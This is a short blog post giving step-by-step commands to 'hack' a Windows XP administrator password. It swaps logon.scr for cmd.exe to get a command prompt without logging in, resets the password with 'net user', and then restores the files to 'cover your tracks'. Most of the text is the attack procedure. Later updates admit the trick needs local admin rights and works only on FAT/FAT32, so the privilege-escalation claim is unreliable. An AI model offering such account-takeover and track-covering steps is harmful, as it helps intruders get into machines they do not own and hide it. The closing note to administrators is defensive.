Windows XP Privilege Escalation Exploit
(Before you continue Read the Updates at the bottom)Here are the steps involved to Hack the Window XP Administrator Password .
- Go to Start –> Run –> Type in CMD
- You will get a command prompt. Enter these commands the way it is given
- cd\
- cd\ windows\system32
- mkdir temphack
- copy logon.scr temphack\logon.scr
- copy cmd.exe temphack\cmd.exe
- del logon.scr
- rename cmd.exe logon.scr
- exit
A Brief explanation of what you are currently doing here is
Your are nagivating to the windows system Directory where the system files are stored. Next your creating a temporary directory called mkdir. After which you are copying or backing up the logon.scr and cmd.exe files into the mkdir then you are deleting the logon.scr file and renaming cmd.exe file to logon.scr.
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin user name is clazh and you want change the password to pass Then type in the following command
net user clazh pass
This will chang the admin password to pass.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.
Here are the steps involved to De Hack or restore the Window XP Administrator Password to cover your tracks.
- Go to Start –> Run –> Type in CMD
- You will get a command prompt. Enter these commands the way it is given
- cd\
- cd\ windows\system32\temphack
- copy logon.scr C:\windows\system32\logon.scr
- copy cmd.exe C:\windows\system32\cmd.exe
- exit
Via internetbusinessdaily.net
Note To administrators: You can block the entire password change thing just a little tweak in the local security policy (control panel->administrative tools,works only for administrators group) will disallow any change in password even if u r the Admin (u can put a number of other restrictions too), but be cautious to give other users limitted accounts. After you have done this, the above Screensaver technique will fail.
Update: Christian Mohn points out The Above method is is possible only if you have Local Administrator Privileges. My fault for not checking it up before posting.
Update: The above Method only works if the system is FAT/FAT32 – because of the updated “user rights management” in NTFS – file level rights etc. This does not work on a system using NTFS.